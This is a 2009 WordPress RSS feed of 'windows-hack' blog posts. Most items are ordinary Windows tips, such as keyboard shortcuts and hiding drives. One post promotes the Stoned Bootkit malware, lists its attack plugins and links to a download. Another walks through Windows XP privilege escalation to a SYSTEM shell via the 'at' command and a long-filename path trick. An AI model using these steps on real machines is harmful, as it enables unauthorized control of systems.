<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress.com" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>windows-hack &amp;laquo; WordPress.com Tag Feed</title>
	<link>http://en.wordpress.com/tag/windows-hack/</link>
	<description>Feed of posts on WordPress.com tagged "windows-hack"</description>
	<pubDate>Mon, 07 Dec 2009 01:52:57 +0000</pubDate>

	<generator>http://en.wordpress.com/tags/</generator>
	<language>en</language>

<item>
<title><![CDATA[how to make your windows xp genuine]]></title>
<link>http://ringbing.wordpress.com/2009/10/10/how-to-make-your-windows-xp-genuine/</link>
<pubDate>Sat, 10 Oct 2009 14:42:13 +0000</pubDate>
<dc:creator>himanshu</dc:creator>
<guid>http://ringbing.wordpress.com/2009/10/10/how-to-make-your-windows-xp-genuine/</guid>
<description><![CDATA[it is sometimes annoying when you can&#8217;t install some applications as you don&#8217;t have a ge]]></description>
<content:encoded><![CDATA[it is sometimes annoying when you can&#8217;t install some applications as you don&#8217;t have a ge]]></content:encoded>
</item>
<item>
<title><![CDATA[no need to restart windows after every application you install]]></title>
<link>http://ringbing.wordpress.com/2009/10/10/no-need-to-restart-windows-after-every-application-you-install/</link>
<pubDate>Sat, 10 Oct 2009 14:08:47 +0000</pubDate>
<dc:creator>himanshu</dc:creator>
<guid>http://ringbing.wordpress.com/2009/10/10/no-need-to-restart-windows-after-every-application-you-install/</guid>
<description><![CDATA[many of the software applications we install need a restart when the installation is complete. but l]]></description>
<content:encoded><![CDATA[many of the software applications we install need a restart when the installation is complete. but l]]></content:encoded>
</item>
<item>
<title><![CDATA[make your own recycle bin]]></title>
<link>http://ringbing.wordpress.com/2009/10/02/make-your-own-recycle-bin/</link>
<pubDate>Fri, 02 Oct 2009 17:00:35 +0000</pubDate>
<dc:creator>himanshu</dc:creator>
<guid>http://ringbing.wordpress.com/2009/10/02/make-your-own-recycle-bin/</guid>
<description><![CDATA[wanna make your own recycle bin in my documents or any folder you wish then follow these simple step]]></description>
<content:encoded><![CDATA[wanna make your own recycle bin in my documents or any folder you wish then follow these simple step]]></content:encoded>
</item>
<item>
<title><![CDATA[Stoned Bootkit: Attack your Windows]]></title>
<link>http://jaiminbhagat.wordpress.com/2009/08/14/stoned-bootkit-attack-your-windows/</link>
<pubDate>Fri, 14 Aug 2009 02:19:06 +0000</pubDate>
<dc:creator>jaiminbhagat</dc:creator>
<guid>http://jaiminbhagat.wordpress.com/2009/08/14/stoned-bootkit-attack-your-windows/</guid>
<description><![CDATA[Old news, but still VERY important. At the recently concluded BlackHat 2009 USA, the Stoned Bootkit ]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><p>Old news, but still VERY important. At the recently concluded BlackHat 2009 USA, the <strong>Stoned Bootkit</strong> was released by <em>Peter Kleissner. </em></p>
<p><span>The Stoned Bootkit has full access to the system and is able to bypass any security check done by Windows. Why is this dangerous and useful at the sametime? Because- first, it has an open source<span><span> architecture. Second, it loads into the computer <span>memory</span> before Windows does! Third, it can work on any platform &#8211; Windows XP </span>and onwards. Fourth, it can attack the TrueCrypt full volume encryption. Now, ain’t that nasty? It sure is. Wait till you read some more about it. This is it’s feature list:</span></span><br />
<span> &#8211; attacks <span>Windows XP</span>, Sever 2003, Windows Vista, Windows 7 with one single master boot record</span><br />
– attacks TrueCrypt full volume encryption<br />
– has integrated FAT and NTFS drivers<br />
– has an integrated structure for plugins and boot applications (for future development)<br />
<span> &#8211; is a Master Boot Record, with the target to be <span>memory</span> resident up to the Windows Kernel</span><br />
- supports the IA32, AT Architecture (IBM-conforming)<br />
- has rich API support<br />
- supports the following boot methods: Floppy, Hard Disk, CD/DVD/Blu Ray, Network (PXE), USB flash drives, and others!</p>
<p><span>As it is said in the features list, it supports the plugin architecture. Since its architecture is <span>open source</span>, you can build as many plugins you want depending on your requirements. Here is a list of plugins that is pre-shipped with the Stoned BootKit:</span></p>
<ul>
<li>User Interface</li>
<li>CO2-Plugin</li>
<li>PE Infector</li>
<li>File Parsers</li>
<li>HibernationFile Attack</li>
<li>PagefileInjector</li>
<li>Music Melody!</li>
<li>BootPassword Crack</li>
<li>AntiWPA</li>
<li>Persistent BIOSInfector</li>
</ul>
<p>In addition to these plugins, it has the following softwares:</p>
<ul>
<li>Forensic Lockdown Software (<em>provides an interface for some operations like a boot menu, original MBR restoration and of course (experimental) locking/unlocking methods.</em>)</li>
<li>Hibernation File Attack (<em>uses the bootkit functions to open and modify the hibernation file and to compress and decompress the buffers using the xpress algorithm.</em>)</li>
<li>Sinowal Loader (loads and executes the Sinowal kernel driver from the file system.)</li>
</ul>
<p>If you want, you can also check how it works using QEmu, Bochs or VMWare! The Stoned Bootkit project name was actually inspired by the <em>Stoned</em><span> virus, the first MBR virus which can infect the <span>Windows XP</span> MBR too. The project itself is built upon the </span><span style="text-decoration:underline;">Hibernation File Attack</span><span>, which was built by the author in the past. The only catch in its installation is that it will need an Administrators access to infect a <span>Windows XP</span> system and an Elevated Administrator access to infect a Windows Vista.</span></p>
<p>The author plans to add more functionality to the further versions by adding features like polymorphism and metamorphism. The target of Stoned is to be the most sophisticated and most widespread used bootkit in 2010!</p>
<p>You can download the Stoned Bootkit <a title="Download Stoned Bootkit" href="http://588f2354.seriousfiles.com/" target="_blank"><strong>here</strong></a><strong> </strong>and read more about it on its homepage <strong><a title="Stoned Bootkit Homepage" href="http://70c4f3dd.seriousurls.com/" target="_blank">here</a></strong>.</p>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[All Keyboard Shutcuts.]]></title>
<link>http://stan4profit.wordpress.com/2009/07/05/all-keyboard-shutcuts/</link>
<pubDate>Sat, 04 Jul 2009 23:02:38 +0000</pubDate>
<dc:creator>stan4profit</dc:creator>
<guid>http://stan4profit.wordpress.com/2009/07/05/all-keyboard-shutcuts/</guid>
<description><![CDATA[All keyboard Shortcuts You can&#8217;t afford to miss this. 1.) Windows Hotkeys Shift + F10 right-cl]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><h1>All keyboard Shortcuts</h1>
<p><!--google_ad_section_end--><!-- google_ad_section_start -->You can&#8217;t afford to miss this.<br />
<span style="font-family:Impact;">1.) Windows Hotkeys</span></p>
<ul>
<li><strong>Shift + F10 right-clicks. </strong></li>
<li><strong>Win + L (XP Only): Locks keyboard. Similar to Lock Workstation. </strong></li>
<li><strong>Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs. </strong></li>
<li><strong>Win + Control + F: Open Find dialog. (Computers) </strong></li>
<li><strong>Win + U: Open Utility Manager. </strong></li>
<li><strong>Win + F1: Open Windows help. </strong></li>
<li><strong>Win + Pause: Open System Properties dialog. </strong></li>
<li><strong>Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks. </strong></li>
<li><strong>Win + Shift + Tab: Cycle through taskbar buttons in reverse. </strong></li>
<li><strong>Alt + Tab: Display CoolSwitch. More commonly known as the AltTab dialog. </strong></li>
<li><strong>Alt + Shift + Tab: Display CoolSwitch; go in reverse. </strong></li>
<li><strong>Alt + Escape: Send active window to the bottom of the z-order. </strong></li>
<li><strong>Alt + Shift + Escape: Activate the window at the bottom of the z-order. </strong></li>
<li><strong>Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog. </strong></li>
<li><strong>Shift while a CD is loading: Bypass AutoPlay. </strong></li>
<li><strong>Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\) </strong></li>
<li><strong>Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog. </strong></li>
<li><strong>Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape. </strong></li>
<li><strong>Printscreen: Copy screenshot of current screen to clipboard. </strong></li>
<li><strong>Alt + Printscreen: Copy screenshot of current active window to clipboard. </strong></li>
<li><strong>Ctrl + Alt + Down Arrow: Invert screen. Untested on OSes other than XP. </strong></li>
<li><strong>Ctrl + Alt + Up Arrow: Undo inversion. </strong></li>
<li><strong>Win + B : Move focus to systray icons.</strong></li>
</ul>
<h3>2.) Generic</h3>
<p><strong> </strong></p>
<p><strong> </strong></p>
<ul>
<li><strong>Ctrl + C or Ctrl + Insert: Copy. </strong></li>
<li><strong>Ctrl + X or Shift + Delete: Cut. </strong></li>
<li><strong>Ctrl + V or Shift + Insert: Paste/Move. </strong></li>
<li><strong>Ctrl + N: New&#8230; File, Tab, Entry, etc. </strong></li>
<li><strong>Ctrl + S: Save. </strong></li>
<li><strong>Ctrl + O: Open&#8230; </strong></li>
<li><strong>Ctrl + P: Print. </strong></li>
<li><strong>Ctrl + Z: Undo. </strong></li>
<li><strong>Ctrl + A: Select all. </strong></li>
<li><strong>Ctrl + F: Find&#8230; </strong></li>
<li><strong>Ctrl+W : to close the current window </strong></li>
<li><strong>Ctrl + F4: Close tab or child window. </strong></li>
<li><strong>F1: Open help. </strong></li>
<li><strong>F11: Toggle full screen mode. </strong></li>
<li><strong>Alt or F10: Activate menu bar. </strong></li>
<li><strong>Alt + Space: Display system menu. Same as clicking the icon on the titlebar. </strong></li>
<li><strong>Escape: Remove focus from current control/menu, or close dialog box. </strong></li>
</ul>
<h3>3.) Generic Navigation</h3>
<p><strong> </strong></p>
<p><strong> </strong></p>
<ul>
<li><strong>Tab: Forward one item. </strong></li>
<li><strong>Shift + Tab: Backward one item. </strong></li>
<li><strong>Ctrl + Tab: Cycle through tabs/child windows. </strong></li>
<li><strong>Ctrl + Shift + Tab: Cycle backwards through tabs/child windows. </strong></li>
<li><strong>Enter: If a button&#8217;s selected, click it, otherwise, click default button. </strong></li>
<li><strong>Space: Toggle items such as radio buttons or checkboxes. </strong></li>
<li><strong>Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item&#8217;s name. </strong></li>
<li><strong>Ctrl + Left: Move cursor to the beginning of previous word. </strong></li>
<li><strong>Ctrl + Right: Move cursor to the beginning of next word. </strong></li>
<li><strong>Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in RichEdit controls. </strong></li>
<li><strong>Ctrl + Down: Move cursor to beginning of next paragraph. </strong></li>
<li><strong>Shift + Left: Highlight one character to the left. </strong></li>
<li><strong>Shift + Right: Highlight one character to the right. </strong></li>
<li><strong>Shift + Up: Highlight from current cursor position, to one line up. </strong></li>
<li><strong>Shift + Down: Highlight from current cursor position, to one line down. </strong></li>
<li><strong>Ctrl + Shift + Left: Highlight to beginning of previous word. </strong></li>
<li><strong>Ctrl + Shift + Right: Highlight to beginning of next word. </strong></li>
<li><strong>Ctrl + Shift + Up: Highlight to beginning of previous paragraph. </strong></li>
<li><strong>Ctrl + Shift + Down: Highlight to beginning of next paragraph. </strong></li>
<li><strong>Home: Move cursor to top of a scrollable control. </strong></li>
<li><strong>End: Move cursor to bottom of a scrollable control. </strong></li>
</ul>
<h3>4.) Generic File Browser</h3>
<p><strong> </strong></p>
<p><strong> </strong></p>
<ul>
<li><strong>Arrow Keys: Navigate. </strong></li>
<li><strong>Shift + Arrow Keys: Select multiple items. </strong></li>
<li><strong>Ctrl + Arrow Keys: Change focus without changing selection. &#8220;Focus&#8221; is the object that will run on Enter. Space toggles selection of the focused item. </strong></li>
<li><strong>(Letter): Select first found item that begins with (Letter). </strong></li>
<li><strong>BackSpace: Go up one level to the parent directory. </strong></li>
<li><strong>Alt + Left: Go back one folder. </strong></li>
<li><strong>Alt + Right: Go forward one folder. </strong></li>
<li><strong>Enter: Activate (Double-click) selected item(s). </strong></li>
<li><strong>Alt + Enter: View properties for selected item. </strong></li>
<li><strong>F2: Rename selected item(s). </strong></li>
<li><strong>Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one. </strong></li>
<li><strong>Delete: Delete selected item(s). </strong></li>
<li><strong>Shift + Delete: Delete selected item(s); bypass Recycle Bin. </strong></li>
<li><strong>Ctrl while dragging item(s): Copy. </strong></li>
<li><strong>Ctrl + Shift while dragging item(s): Create shortcut(s). </strong></li>
<li><strong>In tree pane, if any: </strong></li>
<li><strong>Left: Collapse the current selection if expanded, or select the parent folder. </strong></li>
<li><strong>Right: Expand the current selection if collapsed, or select the first subfolder. </strong></li>
<li><strong>NumpadAsterisk: Expand currently selected directory and all subdirectories. No undo. </strong></li>
<li><strong>NumpadPlus: Expand currently selected directory. </strong></li>
<li><strong>NumpadMinus: Collapse currently selected directory. </strong></li>
</ul>
<h3>5.) Accessibility</h3>
<p><strong> </strong></p>
<p><strong> </strong></p>
<ul>
<li><strong>Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled. </strong></li>
<li><strong>Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled. </strong></li>
<li><strong>Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled. </strong></li>
<li><strong>NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled. </strong></li>
<li><strong>Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled. </strong></li>
<li><strong>6.) Microsoft Natural Keyboard with IntelliType Software Installed </strong></li>
<li><strong>Win + L: Log off Windows. </strong></li>
<li><strong>Win + P: Open Print Manager. </strong></li>
<li><strong>Win + C: Open control panel. </strong></li>
<li><strong>Win + V: Open clipboard. </strong></li>
<li><strong>Win + K: Open keyboard properties. </strong></li>
<li><strong>Win + I: Open mouse properties. </strong></li>
<li><strong>Win + A: Open Accessibility properties. </strong></li>
<li><strong>Win + Space: Displays the list of Microsoft IntelliType shortcut keys. </strong></li>
<li><strong>Win + S: Toggle CapsLock on and off. </strong></li>
</ul>
<h3>7.) Remote Desktop Connection Navigation</h3>
<p><strong> </strong></p>
<p><strong> </strong></p>
<ul>
<li><strong>Ctrl + Alt + End: Open the NT Security dialog. </strong></li>
<li><strong>Alt + PageUp: Switch between programs. </strong></li>
<li><strong>Alt + PageDown: Switch between programs in reverse. </strong></li>
<li><strong>Alt + Insert: Cycle through the programs in most recently used order. </strong></li>
<li><strong>Alt + Home: Display start menu. </strong></li>
<li><strong>Ctrl + Alt + Break: Switch the client computer between a window and a full screen. </strong></li>
<li><strong>Alt + Delete: Display the Windows menu. </strong></li>
<li><strong>Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer. </strong></li>
<li><strong>Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.</strong></li>
</ul>
<h3>8.) Mozilla Firefox Shortcuts</h3>
<p><strong> </strong></p>
<p><strong> </strong></p>
<ul>
<li><strong>Ctrl + Tab or Ctrl + PageDown: Cycle through tabs. </strong></li>
<li><strong>Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse. </strong></li>
<li><strong>Ctrl + (1-9): Switch to tab corresponding to number. </strong></li>
<li><strong>Ctrl + N: New window. </strong></li>
<li><strong>Ctrl + T: New tab. </strong></li>
<li><strong>Ctrl + L or Alt + D or F6: Switch focus to location bar. </strong></li>
<li><strong>Ctrl + Enter: Open location in new tab. </strong></li>
<li><strong>Shift + Enter: Open location in new window. </strong></li>
<li><strong>Ctrl + K or Ctrl + E: Switch focus to search bar. </strong></li>
<li><strong>Ctrl + O: Open a local file. </strong></li>
<li><strong>Ctrl + W: Close tab, or window if there&#8217;s only one tab open. </strong></li>
<li><strong>Ctrl + Shift + W: Close window. </strong></li>
<li><strong>Ctrl + S: Save page as a local file. </strong></li>
<li><strong>Ctrl + P: Print page. </strong></li>
<li><strong>Ctrl + F or F3: Open find toolbar. </strong></li>
<li><strong>Ctrl + G or F3: Find next&#8230; </strong></li>
<li><strong>Ctrl + Shift + G or Shift + F3: Find previous&#8230; </strong></li>
<li><strong>Ctrl + B or Ctrl + I: Open Bookmarks sidebar. </strong></li>
<li><strong>Ctrl + H: Open History sidebar. </strong></li>
<li><strong>Escape: Stop loading page. </strong></li>
<li><strong>Ctrl + R or F5: Reload current page. </strong></li>
<li><strong>Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache. </strong></li>
<li><strong>Ctrl + U: View page source. </strong></li>
<li><strong>Ctrl + D: Bookmark current page. </strong></li>
<li><strong>Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size. </strong></li>
<li><strong>Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size. </strong></li>
<li><strong>Ctrl + Numpad0 or Ctrl + 0: Set text size to default. </strong></li>
<li><strong>Alt + Left or Backspace: Back. </strong></li>
<li><strong>Alt + Right or Shift + Backspace: Forward. </strong></li>
<li><strong>Alt + Home: Open home page. </strong></li>
<li><strong>Ctrl + M: Open new message in integrated mail client. </strong></li>
<li><strong>Ctrl + J: Open Downloads dialog. </strong></li>
<li><strong>F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab. </strong></li>
<li><strong>Shift + F6: Switch to previous frame. </strong></li>
<li><strong>Apostrophe (&#8216;): Find link as you type. </strong></li>
<li><strong>Slash (/): Find text as you type. </strong></li>
</ul>
<h3>9.) GMail</h3>
<p><strong><br />
</strong></p>
<ul>
<li><strong>Note: Must have &#8220;keyboard shortcuts&#8221; on in settings. </strong></li>
<li><strong>C: Compose new message. </strong></li>
<li><strong>Shift + C: Open new window to compose new message. </strong></li>
<li><strong>Slash (/): Switch focus to search box. </strong></li>
<li><strong>K: Switch focus to the next most recent email. Enter or &#8220;O&#8221; opens focused email. </strong></li>
<li><strong>J: Switch focus to the next oldest email. </strong></li>
<li><strong>N: Switch focus to the next message in the &#8220;conversation.&#8221; Enter or &#8220;O&#8221; expands/collapses messages. </strong></li>
<li><strong>P: Switch focus to the previous message. </strong></li>
<li><strong>U: Takes you back to the inbox and checks for new mail. </strong></li>
<li><strong>Y: Various actions depending on current view: </strong></li>
<li><strong>Has no effect in &#8220;Sent&#8221; and &#8220;All Mail&#8221; views. </strong></li>
<li><strong>Inbox: Archive email or message. </strong></li>
<li><strong>Starred: Unstar email or message. </strong></li>
<li><strong>Spam: Unmark as spam and move back to &#8220;Inbox.&#8221; </strong></li>
<li><strong>Trash: Move back to &#8220;Inbox.&#8221; </strong></li>
<li><strong>Any label: Remove the label.</strong></li>
<li><strong>X: &#8220;Check&#8221; an email. Various actions can be performed against all checked emails. </strong></li>
<li><strong>S: &#8220;Star&#8221; an email. Identical to the more familiar term, &#8220;flagging.&#8221; </strong></li>
<li><strong>R: Reply to the email. </strong></li>
<li><strong>A: Reply to all recipients of the email. </strong></li>
<li><strong>F: Forward an email. </strong></li>
<li><strong>Shift + R: Reply to the email in a new window. </strong></li>
<li><strong>Shift + A: Reply to all recipients of the email in a new window. </strong></li>
<li><strong>Shift + F: Forward an email in a new window. </strong></li>
<li><strong>Shift + 1 (!): Mark an email as spam and remove it from the inbox. </strong></li>
<li><strong>G then I: Switch to &#8220;Inbox&#8221; view. </strong></li>
<li><strong>G then S: Switch to &#8220;Starred&#8221; view. </strong></li>
<li><strong>G then A: Switch to &#8220;All Mail&#8221; view. </strong></li>
<li><strong>G then C: Switch to &#8220;Contacts&#8221; view. </strong></li>
<li><strong>G then S: Switch to &#8220;Drafts&#8221; view.</strong></li>
</ul>
<h3>10.) List of F1-F9 Key Commands for the Command Prompt</h3>
<p><strong> </strong></p>
<p><strong> </strong></p>
<ul>
<li><strong>F1 / right arrow: Repeats the letters of the last command line, one by one. </strong></li>
<li><strong>F2: Displays a dialog asking user to &#8220;enter the char to copy up to&#8221; of the last command line </strong></li>
<li><strong>F3: Repeats the last command line </strong></li>
<li><strong>F4: Displays a dialog asking user to &#8220;enter the char to delete up to&#8221; of the last command line </strong></li>
<li><strong>F5: Goes back one command line </strong></li>
<li><strong>F6: Enters the traditional CTRL+Z (^z) </strong></li>
<li><strong>F7: Displays a menu with the command line history </strong></li>
<li><strong>F8: Cycles back through previous command lines (beginning with most recent) </strong></li>
<li><strong>F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered. </strong></li>
<li><strong>Alt+Enter: toggle fullScreen mode. </strong></li>
<li><strong>up/down: scroll thru/repeat previous entries </strong></li>
<li><strong>Esc: delete line </strong></li>
</ul>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[MAKE YOUR DATA CONFIDENTIAL]]></title>
<link>http://stan4profit.wordpress.com/2009/07/04/51/</link>
<pubDate>Sat, 04 Jul 2009 22:54:08 +0000</pubDate>
<dc:creator>stan4profit</dc:creator>
<guid>http://stan4profit.wordpress.com/2009/07/04/51/</guid>
<description><![CDATA[How to Hide Partition. IT&#8217;s EASIER THAN YOU THINK How to Hide the Partitions? This trick is fo]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><h1>How to Hide Partition.</h1>
<p><!--google_ad_section_end--><!-- google_ad_section_start --></p>
<h2>IT&#8217;s EASIER THAN YOU THINK</h2>
<h2><span style="font-family:Times;color:#ffa500;"><em><strong>How to Hide the  Partitions?</strong></em></span></h2>
<p><span style="font-family:Times;color:#ffa500;"> </span></p>
<table style="height:89px;" border="0" cellspacing="0" cellpadding="0" width="910">
<tbody>
<tr>
<td width="100%">
<li><span style="font-family:Times;color:#ffa500;">This trick is for all those people who want to hide tons of data into their box. So here it is, if you have very important data in your hard drive placed in some partition which you do not want anybody to access then this trick is only for you!</span></li>
<li><span style="font-family:Times;color:#ffa500;">Just click on start&#62;run type gpedit.msc, now navigate through user configuration&#62; administrative templates &#62; windows components&#62; windows explorer, now double click on “Hide these specified drives in My Computer” modify it accordingly then just below you will find another option “Prevent access to drives from My Computer”, double click on this option and modify it accordingly.</span></li>
<li><span style="font-family:Times;color:#ffa500;">To make it visible again select &#8220;disable&#8221; by double clicking on the “Hide these specified drives in My Computer” option.</span></li>
</td>
</tr>
</tbody>
</table>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacking "Admin" from "User" mode and more]]></title>
<link>http://stan4profit.wordpress.com/2009/06/20/44/</link>
<pubDate>Sat, 20 Jun 2009 21:50:07 +0000</pubDate>
<dc:creator>stan4profit</dc:creator>
<guid>http://stan4profit.wordpress.com/2009/06/20/44/</guid>
<description><![CDATA[Haking &#8220;admin&#8221; from &#8220;user&#8221; mode n more Most popular page of really that is p]]></description>
<content:encoded><![CDATA[<div class='snap_preview'><h1>Haking &#8220;admin&#8221; from &#8220;user&#8221; mode n more</h1>
<p><!--google_ad_section_end--><!-- google_ad_section_start --></p>
<div id="WPC-areaContainer?cellId=Haking+%22admin%22+from+%22user%22+mode+n+more">
<div id="WPC-area?cellId=Haking+%22admin%22+from+%22user%22+mode+n+more&#38;version=4&#38;savePath=%2Fpage%2FHaking%2B%2522admin%2522%2Bfrom%2B%2522user%2522%2Bmode%2Bn%2Bmore&#38;saveType=page">
<div><span style="font-family:Impact;color:#ff0000;font-size:large;"><a href="http://crack0hack.wetpaint.com/page/Hack+for+free+online+shopping%21%21+100%25+working" target="_self"><span style="color:#ffffff;">Most popular page of</span></a></span></div>
<div><span style="font-family:Impact;color:#ff0000;font-size:large;"><a href="http://crack0hack.wetpaint.com/page/Hack+for+free+online+shopping%21%21+100%25+working" target="_self"></a></span><strong>really that is possible !</strong></div>
<p>Refer to the other articles on this wiki for the same topic<br />
as windows seems to have fixed this bug..<br />
still u can browse for educational purpose</p>
<p><strong>u know why is it a &#8220;user&#8221; account because it lacks come service layer than that in &#8220;administrator&#8221; account</strong></p>
<p><strong>Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.</strong></p>
<p><strong>Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).</strong></p>
<p><strong>The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager</strong></p>
<p><strong>Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way: </strong></p>
<p><strong><span style="text-decoration:underline;">You can trick the system into running a program, script, or batch file with system level privileges.</span></strong></p>
<p><strong>One sample</strong></p>
<p><strong><em>One trick is to use a vulnerability in Windows long filename support.<br />
Try placing an executable named Program.*, in the root directory of the &#8220;Windows&#8221; drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the &#8220;Program Files&#8221; directory is a startup app. The call to &#8220;Program Files&#8221;, will be intercepted by Program.*.</em></strong></p>
<p><strong><em>Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.</em></strong></p>
<blockquote>
<blockquote>
<blockquote>
<blockquote>
<blockquote>
<blockquote><p><strong>Quote:</strong></p></blockquote>
</blockquote>
</blockquote>
</blockquote>
</blockquote>
</blockquote>
<p>In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.</p>
<p><strong>Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within. </strong><br />
<strong>Getting SYSTEM </strong><br />
<strong>I will now walk you through the process of obtaining SYSTEM privileges. </strong><br />
<strong>To start, lets open up a command prompt (Start &#62; Run &#62; cmd &#62; [ENTER]). </strong><br />
<strong>At the prompt, enter the following command, then press [ENTER]: </strong></p>
<h3>Code:</h3>
<h3>at</h3>
<p><strong>If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]: </strong></p>
<h3>Code:</h3>
<h3>at 15:25 /interactive “cmd.exe”</h3>
<p><strong>Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this: </strong></p>
<p><strong>When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this: </strong></p>
<p><strong>You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there. </strong><br />
<strong>At the system command prompt, enter in the following: </strong></p>
<blockquote>
<h3>Code:</h3>
<h3>explorer.exe</h3>
</blockquote>
<p><strong>A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom): </strong><br />
<strong><br />
System user name on start menu</strong></p>
<p><strong><br />
explorer.exe running under SYSTEM</strong></p>
<p><strong>What to do now </strong><br />
<strong>Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.</strong></p>
<p><strong> </strong></p>
<h3><em><strong>ADMINISTRATOR IN WELCOME SCREEN.</strong></em></h3>
<p><strong> </strong></p>
<p><strong>When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the &#8220;Welcome Screen&#8221; does not give you the option to log on as Administrator unless you boot up in Safe Mode.<br />
First you must ensure that the Administrator Account is enabled:<br />
1 open Control Panel<br />
2 open Administrative Tools<br />
3 open Local Security Policy<br />
4 expand Local Policies<br />
5 click on Security Options<br />
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the &#8220;Win2000 Logon Screen Tweak&#8221; ie.<br />
1 open Control Panel<br />
2 open User Accounts<br />
3 click Change the way users log on or log off<br />
4 untick Use the Welcome Screen<br />
5 click Apply Options<br />
You will now be able to log on to Windows XP as Administrator in Normal Mode.</strong></p>
<p><strong> </strong></p>
<h3><em><strong>EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!</strong></em></h3>
<p><strong> </strong></p>
<p><strong>Start the Registry Editor Go to:<br />
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \<br />
Right-click an empty space in the right pane and select New &#62; DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it&#8217;s Value data. Close the registry editor and restart.</strong></div>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hack password windows]]></title>
<link>http://mikel3.wordpress.com/2009/05/03/hack-password-windows/</link>
<pubDate>Sun, 03 May 2009 12:21:17 +0000</pubDate>
<dc:creator>_mikele_</dc:creator>
<guid>http://mikel3.wordpress.com/2009/05/03/hack-password-windows/</guid>
